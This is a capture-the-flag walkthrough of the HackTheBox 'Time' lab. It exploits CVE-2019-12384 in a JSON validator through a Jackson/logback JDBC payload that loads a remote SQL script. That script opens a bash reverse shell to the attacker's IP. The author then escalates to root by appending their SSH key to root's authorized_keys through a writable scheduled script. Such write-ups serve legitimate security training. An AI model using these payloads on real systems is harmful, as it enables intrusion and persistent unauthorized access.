Time Walkthrough | HackTheBox
| Name | Time |
|---|---|
| OS | Linux |
| Difficulty | Medium |
| Base Points | 30 |
| Release Date | 24 October 2020 |
| IP | 10.10.10.214 |
Information Gathering
Starting with NMap Scan.
sudo nmap -A 10.10.10.214
Results:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-29 09:52 EST Nmap scan report for 10.10.10.214 Host is up (0.27s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Online JSON parser Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 265.14 ms 10.10.14.1 2 265.21 ms 10.10.10.214 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 39.11 seconds
Here I got a web server which has a JSON Beautifier & Validator. I passed a random data and got an error which is related to "fasterxml".
Getting the Shell
On googling, I found that there is a registered CVE for this which is CVE-2019-12384 and I got a related article here
Using the same, I created the exploit mentioned below.
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.145/1234 0>&1 &')
To transfer this exploit, I ran python's http.server module and transfered the same with the following Input to the JSON Validator.
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.145:8000/inject.sql'"}]
As soon as I ran it, I got the reverse shell.
kali@kali:~/HackTheBox/Time$ nc -lvp 1234 listening on [any] 1234 ... 10.10.10.214: inverse host lookup failed: Unknown host connected to [10.10.14.145] from (UNKNOWN) [10.10.10.214] 39670 bash: cannot set terminal process group (-1): Inappropriate ioctl for device. bash: no job control in this shell pericles@time:/var/www/html$ cd /home/pericles cd /home/pericles pericles@time:/home/pericles$ cat user.txt cat user.txt eea96292c498dcf0b90259600334f49a
Privilege Escalation
I started the enumeration using linPEAS and found that I can I have access to a script at /usr/bin/timer_backup.sh
I simply edited that script using echo and then I was able to perform SSH using my own system's ssh key.
pericles@time:/usr/bin$ echo "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW9xXdDa5U4p5DuuiWqG/H5nPQ8OfcHVR99Lxe/lxqo4AxIiW9c7vgylRli60Jh27yIKzMql7nfrvPmkn8//xtWF7mZhq+pgg3shZMdky96zUtl9qVwUWowEUC/sB/onp5PvmTeeJDHTmXCmtKu794IAhbvt193tTVQfro8t8hW/9P2T8dKrE7lMUDxPeAGrwS2ZOuWLGZieBwfKrsYsx+n/BdV/L7DNhvU+rEJSzIs1wvbnX5uICuTPqm2yzuc0ME9QY1+QukR6DqsvGj0cI3sZ3AnZao2ae4ULoLdIVsbkCAQWK0r2Nno8iEaJhtAujFhRZbZ1SJYETA6JVkwC2jhOlV6XgPMJeSSXRLfLtnVYhPEGw998uP0sHtwdTlutAJoKysLmszPnxXk5B8YZNPeAfL34No1uEQlwuAUfgUN6cRFXCIP9byN/8Q3yg2ZRzuzGn3zt/jhBpnQja+KjvLHVwDG8RrNYF1xBKZSjfezWP4Mu74aLgV+Q3UrO4RNsU= >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
Now, I can get the root shell with the command.
kali@kali:/HackTheBox/Time$ ssh -i ~/.ssh/id_rsa root@10.10.10.214 ... root@time:~# whoami root root@time:~# cat root.txt d8815bebb94ab95b5e3d4f3370dba11e